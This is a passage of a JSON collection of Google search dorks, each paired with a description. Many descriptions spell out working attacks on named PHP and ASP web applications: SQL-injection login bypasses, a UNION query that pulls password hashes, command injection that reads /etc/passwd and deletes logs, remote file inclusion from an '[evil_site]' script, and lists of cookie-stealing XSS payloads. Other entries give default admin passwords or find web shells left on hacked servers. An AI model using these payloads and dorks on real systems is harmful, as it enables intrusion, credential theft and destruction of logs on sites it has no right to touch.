can craft a url to redirect a victim to an evil site:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]path disclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformation disclosure:googledork:PHPFreeNews inurl:Admin.php(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...because this info are shownwed with non-chalance in admin.php page ;) )default password:login: Adminpass: AdminMySQL Injection / Login Bypass in previous versions:login: Adminpassword: ') or isnull(1/0) or ('a'='anote: all string, not consider 'or'in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version"}, {"dork": "inurl:nquser.php filetype:php", "description": "Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text \"Ping IP Address or Host Name\", example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=\"/>alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd"}, {"dork": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "description": "26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scriptingsoftware: author site: http://www.phpsimplicity.com/scripts.php?id=3remote commands execution:problem at line 25-30: ...//check for language overriding..if (isset($_GET['language'])) $language = strtolower($_GET['language']);//now we include the language filerequire_once(\"$language.lng\");...you can include whatever adding a null byte to \"language\" parameter value:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload & download page together :)so you can upload a cmd.gif (when you upload a .php file, usually it isrenamed to .html...) file with this php code inside to executecommands:then try this url:http://[target]/[path]/download.php?language=cmd.gif%00&command=lsto list directorieshttp://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwdto show /etc/passwd filecross site scripting:also, a remote user can supply a specially crafted URL to redirect other peopleto an evil page:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:\"Powered By: Simplicity oF Upload\""}, {"dork": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "description": "24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/news.php?newsid=\">alert(document.cookie)http://[target]/[path]/news.php?front_rating=\">alert(document.cookie)http://[target]/[path]/news.php?salt=\">alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=\">alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=\">alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop...) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user: ' OR 'a'='aand pass : ' OR 'a'='a boom! you're admin ...the problem is in usercheck.php at line 5:$sql = \"select username from newsadmin where username='$checkuser' and password='$checkpass'\";you can post always true statements, like 'a'='a'solution: replace $checkuser and $checkpass vars with your username and pass, by the moment"}, {"dork": "\"Powered by FunkBoard\"", "description": "FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=\">alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = \" so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file"}, {"dork": "\"Powered by Xcomic\"", "description": "\"Powered by xcomic\"this is a recent exploit, you can retrieve any file on target systemby using \"../\" chars and null byte (%00), example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launch commands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html"}, {"dork": "\"Warning:\" \"Cannot execute a blank command in\"", "description": "\"Warning: passthru(): Cannot execute a blank command in\" \"Warning: system(): Cannot execute a blank command in\" \"Warning: exec(): Cannot execute a blank command in\" generally: \"Warning:\" \"Cannot execute a blank command in\" this a php error message, essentially it shows hacked pages links where someone leaved a backdoor and the page has error_reporting not set to 0... you can execute shell commands simply appending a var, guessing variable name, usually 'cmd' or 'command' or something else, example: http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd"}, {"dork": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "description": "Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.skyminds.net/source/description: a mail form scriptvulnerability: unsecure file creation -> remote code executionwhen you post an attachment and upload it to the server (usually to \"./upload/\" dir )the script rename the file in this way:[time() function result] + [-] + [filename that user choose]spaces are simply replaced with \"_\" chars.So a user can post an executable attachment, calculate the time() result locallythen, if attachment is a file like this:can launch commands on target system, example:http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at this url: http://rgod.altervista.org/mailitnow.html"}, {"dork": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "description": "several vulnerabilities relating to this.MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. User interface allows members to add news, content, write reviews and share information among other registered users.h**p://www.maxwebportal.com/"}, {"dork": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "description": "e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.http://www.securityfocus.com/bid/14699"}, {"dork": "inurl:cartwiz/store/index.asp", "description": "The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.There are, multiple sql injection and xss in cartwiz asp cart.http://neworder.box.sk/explread.php?newsid=13534"}, {"dork": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "description": "Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.Authentication bypass, sql injections and xss in ArticleLive 2005http://neworder.box.sk/explread.php?newsid=13582"}, {"dork": "\"powered by my little forum\"", "description": "My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: \"A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP > 4.1 and a MySQL database.\"1) look at the vulnerable code at line 144 inside search.php:... $result = mysql_query(\"SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL \". $time_difference.\" HOUR,'\".$lang['time_format'].\"') AS Uhrzeit, DATE_FORMAT(time + INTERVAL \".$time_difference.\" HOUR, '\".$lang['time_format'].\"') AS Datum, subject, name, email, hp, place, text, category FROM \".$forum_table.\" WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \" .$settings['search_results_per_page'], $connid);...now goto the search page, select \"phrase\", and type:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*if magic quotes are off you will have (guess?...) any admin/user password hash'cause $searchstring var is not filtered...u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:...$result = mysql_query(\"SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \".$time_difference.\" HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM \".$db_settings['forum_table'].\"WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \".$settings['search_results_per_page'],$connid);...you have same results, deleting a statement in injection string:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*"}, {"dork": "\"powered by mailgust\"", "description": "MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability:if magic quotes off -> SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250 [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:250 RCPT TO:>[your_email] OKRCPT TO: OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],'or'a'='a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250 Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:...$query = \"SELECT * FROM $applName\".\"_$userClassName \". \"WHERE email='$this->email'\";...it becomes:SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'\"or'a'='a'\" is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html"}, {"dork": "intitle:\"CJ Link Out V1\"", "description": "A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. The vulnerability report can be found at http://secunia.com/advisories/16970/ ."}, {"dork": "inurl:guestbook/guestbooklist.asp \"Post Date\" From", "description": "A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral ways of finding the vulnerable file:Guestbook (the above dork): inurl:guestbook/guestbooklist.asp \"Post Date\" From Country Results 1 - 21 of 123Announcement: inurl:MainAnnounce1.asp \"show all\" Results 1 -20 of 86WebDirectory: inurl:webdirectory \"Total Available Web Sites\" Search Results 1 - 4 of 5MailingList: inurl:maillinglist/emailsadd.asp Results 1 - 6 of 6note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out."}, {"dork": "vBulletin Install Page Detection", "description": "inurl:/install/install.php intitle:vBulletin * Install System\nThis dork displays the untreated install.php pages!\nAuth0r: lionaneesh\nGreetz to :Team Indishell , INDIA , Aasim Shaikh ,"}, {"dork": "ionCube Loader Wizard information disclosure", "description": "inurl:loader-wizard ext:php\nThis dork displays sensitive information\nAuth0r: MaXe"}, {"dork": "allinurl:forcedownload.php?file=", "description": "Didn't see this anywhere in the GHDB, but its been known for a while and \r\n\r\nwidely abused by others.\r\n\r\n\r\n\r\nGoogle Dork \"allinurl:forcedownload.php?file=\"\r\n\r\n\r\n\r\nSites that use the forcedownload.php script are vulnerable to url \r\n\r\nmanipulation, and will spit out any file on the local site, including the \r\n\r\nPHP files themselves with all server side code, not the rendered page, but \r\n\r\nthe source itself. This is most commonly used on wordpress sites to grab the \r\n\r\nwp-config.php file to gain access to the database, but is not limited to \r\n\r\nwordpress sites. I only list it as an example, so people understand the \r\n\r\nweight of flaw.\r\n\r\n\r\n\r\n- DigiP"}, {"dork": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "description": "Dork:\n-site:simplemachines.org \"These are the paths and URLs to your SMF\ninstallation\"\nDetails:\nThis google dork finds sites with the Simple Machines repair_settings.php\nfile uploaded to the root directory. This gives unauthenticated access to\nthe SQL username and password for the forum."}, {"dork": "inurl:demo.browse.php intitle:getid3", "description": "The getID3 demo can allow directory traversal, deleting files, etc.\nhttps://github.com/JamesHeinrich/getID3/blob/master/demos/demo.browse.php\nSean Murphy / Senior Developer / Wordfence\n4948 DD81 CF99 3510 DFF0 44A6 A6D8 401E D683 98F5"}, {"dork": "index of admin/fckeditor/editor/filemanager/", "description": "Dork: index of admin/fckeditor/editor/filemanager/\r\nDescription: will show some login and juicy information related to parent directory and details \r\nAuthor: Priyanka Prasad"}, {"dork": "intitle:\"index of\" \"nrpe.cfg\"", "description": "*intitle:\"index of\" \"nrpe.cfg\"*\r\n\r\nThis dork helps to view sensitive information by pulling NRPE config file\r\nwhich is used for Nagios monitoring. This file can contain password for\r\ncustomized plugins and can also reveal internal IPs.\r\n\r\nPlease find the attached txt file containing details.\r\n\r\nThanks and Regards\r\nAnurag Muley"}, {"dork": "Dork: \"Index of\" \"upload_image.php\"", "description": "Hello ,\r\nDork Title: Vulnerable Files\r\nGoogle Dork: \"Index of\" \"upload_image.php\"\r\nDate: [11-06-2020]\r\nDork Author: Swapnil Talele"}, {"dork": "Dork: \"index of\" \"Production.json\"", "description": "Google Dork: \"index of\" \"Production.json\"\r\nDork Title: Files Containing Juicy Info\r\nDate: [11-06-2020]\r\nDork Author: Swapnil Talele"}, {"dork": "index.of.?.frm", "description": "Dork: index.of.?.frm\r\nDescription: This google dorks lists out sensitive frm files on web servers\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"schema.sql\"", "description": "# Google Dork: intitle:\"index of\" \"schema.sql\"\r\n# Vulnerable Files\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"index of /\" intext:wp-config \"zip\"", "description": "# Google Dork: \"index of /\" intext:wp-config \"zip\"\r\n# Vulnerable files\r\n# Date: 11/09/2021\r\n# Exploit Author: morningst4r"}, {"dork": "intitle: Index of /assets/admin/system", "description": "# Google Dork: intitle: Index of /assets/admin/system\r\n# Vulnerable Files\r\n# Date: 12/09/2021 \r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "inurl:/supportboard", "description": "# Google Dork: inurl:/supportboard\r\n# Vulnerable Files\r\n# Date:16/09/2021\r\n# Exploit Author: Jamal Lalaoui\r\n# CVE: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)\r\nSupport Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)"}, {"dork": "Google Dork: intitle:\"index of\" \"/sql\" \"admin\"", "description": "# Google Dork: intitle:\"index of\" \"/sql\" \"admin\"\r\n#Description: This Dork will return the important files containing admin setup to sql.\r\n#Date: 21/09/2021.\r\n#Exploit Author: Bon Sai"}, {"dork": "intitle:\"index of\" \"/cgi-bin\" \"admin\"", "description": "# Google Dork: intitle:\"index of\" \"/cgi-bin\" \"admin\"\r\n# Vulnerable Files\r\n# Date: 30/09/2021 \r\n# Exploit Author: Yash Singh"}, {"dork": "intext:\"powered by BlueCMS v1.6\"", "description": "# Google Dork: intext:\"powered by BlueCMS v1.6\"\r\n# Vulnerable Files\r\n# Date: 10-06-2021\r\n# Author: Rahul B Pallickal\r\n# Description: Google Dork to find the pages vulnerable to CVE-2020-19853"}, {"dork": "intitle:\"index of\" \"master03.xml\"", "description": "# Google Dork: intitle:\"index of\" \"master03.xml\"\r\n# Vulnerable Files\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"stylesheet.css\"", "description": "# Google Dork: intitle:\"index of\" \"stylesheet.css\"\r\n# Vulnerale Files\r\n# Date: 03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"pres.xml\"", "description": "# Google Dork: intitle:\"index of\" \"pres.xml\"\r\n# Vulnerable Files\r\n# Date: 03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" site:.in", "description": "# Google Dork: intitle:\"Index of\" site:.in\r\n# Vulnerable Files\r\n# Date: 09/11/2021 \r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:*gov intitle:\"index of\" \"docker-compose\"", "description": "# Google Dork: inurl:*gov intitle:\"index of\" \"docker-compose\"\r\n# Vulnerable Files\r\n# Date: 10/11/2021\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "intitle:\"index of\" \"*.pl\"", "description": "# Google Dork: intitle:\"index of\" \"*.pl\"\r\n# Vulnerable Files\r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"*.phtml\"", "description": "# Google Dork: intitle:\"index of\" \"*.phtml\"\r\n# Vulnerable Files \r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"*.php\"", "description": "# Google Dork: intitle:\"index of\" \"*.php\"\r\n# Vulnerable Files\r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:index.of.etc", "description": "# Google Dork: intitle:index.of.etc\r\n# Vulnerable Files\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:.com index of movies", "description": "# Google Dork: inurl:.com index of movies\r\n# Vulnerable Files\r\n# Date: 18/12/2021\r\n# Exploit Author: Ved Kolambkar"}, {"dork": "allintext:wp-includes/rest-api", "description": "# Google Dork: allintext:wp-includes/rest-api\r\n# Vulnerable Files\r\n# Date: 01/01/2022\r\n# Exploit Author: Jayson Zabate"}, {"dork": "intitle:\"index of\" \"*.phtml\" site:.edu", "description": "# Google Dork: intitle:\"index of\" \"*.phtml\" site:.edu\r\n# Vulnerable Files\r\n# Date: 20/10/2023\r\n# Exploit Author: Ali Ahamed"}], "Vulnerable Servers": [{"dork": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "description": "This search reveals wide-open samba web adminitration servers. Attackers can change options on the server."}, {"dork": "\"ftp://\" \"www.eastgame.net\"", "description": "Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.\"thankyou4share\" !"}, {"dork": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "description": "search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges."}, {"dork": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\" inurl:imchaos", "description": "IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page."}, {"dork": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "description": "This reveals admin site for Argo Software Design Mail Server."}, {"dork": "inurl:rpSys.html", "description": "Web configuration pages for various types of systems. Many of these systems are not password protected."}, {"dork": "filetype:pl intitle:\"Ultraboard Setup\"", "description": "setup pages to the ultraboard system."}, {"dork": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "description": "Hi It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...Edited by CP"}, {"dork": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "description": "File upload servers, dangerous if used in couple with mytrashmail.com"}, {"dork": "http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss", "description": "CVE: 2007-4007\nEDB-ID: 4221\nThis google dork possibly exposes sites with the Article Directory (index.php page) Remote File Inclusion Vulnerability"}, {"dork": "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"r57shell 1.4\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"r57shell\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "description": "Locates c99 web shells Author: ScOrPiOn"}, {"dork": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "description": "Locates CGI-Telnet web shells. Author: ScOrPiOn"}, {"dork": "inurl:/vb/install/upgrade.php", "description": "Vbulletin custom updrade wizards. Author: ScOrPiOn"}, {"dork": "intitle:cyber anarchy shell", "description": "Submitter: eXeSoul cyber anarchy shell"}, {"dork": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "description": "Author :- eXeSoul\nYou will get lots of web shells even some private shells."}, {"dork": "inurl:view.php?board1_sn=", "description": "locates a webapp vulnerable to SQL injection"}, {"dork": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "description": "locates cpanel and ftp cracker. Author: alsa7r"}, {"dork": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "description": "Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones"}, {"dork": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "description": "This search attempts to find the BOFF 1.0 Shell. Author: alsa7r"}, {"dork": "intitle:\"-N3t\" filetype:php undetectable", "description": "intitle:\"-N3t\" filetype:php undetectable\nSearch WebShell indexed on a page.\n-- \nJoel Campusano Rojas.\n632 161 62\n@joelcampusano\nIngeniero Civil en Inform\ufffdtica."}, {"dork": "inurl:/wp-content/w3tc/dbcache/", "description": "- Jay Townsend"}, {"dork": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "description": "gnu-bash site dorks\nAriel Anonis - @ariel_anonis"}, {"dork": "inurl:/proc/self/cwd", "description": "# Google Dork: inurl:/proc/self/cwd\r\n\r\n\r\n\r\nVulnerable web servers that have either been misconfigured or compromised in \r\n\r\nsome manner already, allow appending \"/proc/self/cwd/\" with the path of \r\n\r\nlocal server files. This could be from an LFI on an insecure PHP script like \r\n\r\nfile=/proc/self/cwd/some/path/to/file, or directly in the URL path of the \r\n\r\nsite like somesite.com/proc/self/cwd/some/exposed/stuff/here\r\n\r\n\r\n\r\n- digip"}, {"dork": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\" \t", "description": "Upload Vulnerability Elfinder 2.0\ninurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\""}, {"dork": "inurl:shop \"Hassan Consulting's Shopping Cart Version 1.18\"", "description": "These servers can be messed with in many ways. One specific way is by way of the \"../\" bug. This lets you cruise around the web server in a somewhat limited fashion."}, {"dork": "\"YaBB SE Dev Team\"", "description": "Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others."}, {"dork": "intitle:\"Gallery in Configuration mode\"", "description": "Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!"}, {"dork": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "description": "This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache."}, {"dork": "inurl:ManyServers.htm", "description": "Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely."}, {"dork": "intitle:\"Terminal Services Web Connection\"", "description": "Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a \"protected\" machine."}, {"dork": "intitle:\"Remote Desktop Web Connection\"", "description": "Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine."}, {"dork": "\"Welcome to Intranet\"", "description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information."}, {"dork": "inurl:search.php vbulletin", "description": "Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info."}, {"dork": "inurl:footer.inc.php", "description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server."}, {"dork": "inurl:info.inc.php", "description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server."}, {"dork": "\"Welcome to PHP-Nuke\" congratulations", "description": "This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps."}, {"dork": "\"Select a database to view\" intitle:\"filemaker pro\"", "description": "An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if 